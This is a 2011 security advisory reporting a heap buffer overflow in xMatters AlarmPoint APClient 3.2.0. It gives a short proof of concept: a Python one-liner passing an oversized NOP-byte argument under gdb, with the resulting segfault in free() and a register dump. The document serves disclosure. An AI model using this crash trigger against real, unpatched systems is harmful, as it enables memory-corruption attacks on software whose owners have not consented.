xMatters AlarmPoint APClient 3.2.0 Heap Buffer Overflow

Type packetstorm
Reporter Juan Sacco
Modified 2011-04-29T00:00:00


                                            ` Information  
Name : Heap Buffer Overflow in xMatters AlarmPoint APClient  
Version: APClient 3.2.0 (native)  
Software : xMatters AlarmPoint  
Vendor Homepage : http://www.xmatters.com  
Vulnerability Type : Heap Buffer Overflow  
Md5: 283d98063323f35deb7afbd1db93d859 APClient.bin  
Severity : High  
Researcher : Juan Sacco <jsacco [at] insecurityresearch [dot] com>  
The AlarmPoint Java Server consists of a collection of software  
components and software APIs designed to provide a flexible and  
powerful set of tools for integrating various applications to  
AlarmPoint APClient is affected by a Heap Overflow vulnerability in   
version APClient 3.2.0 (native)  
A heap overflow condition is a buffer overflow, where the buffer that   
can be overwritten is allocated in the heap portion of memory, generally   
meaning that the buffer was allocated using a routine such as the POSIX   
malloc() call.  
Exploit as follow:  
Submit a malicious file cointaining the exploit  
./APClient.bin --submit-file maliciousfile.hex  
(gdb) run `python -c 'print "\x90"*16287'`  
Starting program:   
/opt/alarmpointsystems/integrationagent/bin/APClient.bin `python -c   
'print "\x90"*16287'`  
Program received signal SIGSEGV, Segmentation fault.  
0x0804be8a in free ()  
(gdb) i r  
eax 0xa303924 170932516  
ecx 0xbfb8 49080  
edx 0xa303924 170932516  
ebx 0x8059438 134583352  
esp 0xbfff3620 0xbfff3620  
ebp 0xbfff3638 0xbfff3638  
esi 0x8059440 134583360  
edi 0x80653f0 134632432  
eip 0x804be8a 0x804be8a <free+126>  
eflags 0x210206 [ PF IF RF ID ]  
cs 0x73 115  
ss 0x7b 123  
ds 0x7b 123  
es 0x7b 123  
fs 0x0 0  
gs 0x33 51  
No patch are available at this time.  
Manual discovered by Insecurity Research Labs  
Juan Sacco - http://www.insecurityresearch.com  
Insecurity Research - Security auditing and testing software  
Web: http://www.insecurityresearch.com  
Insect Pro 2.5 was released stay tunned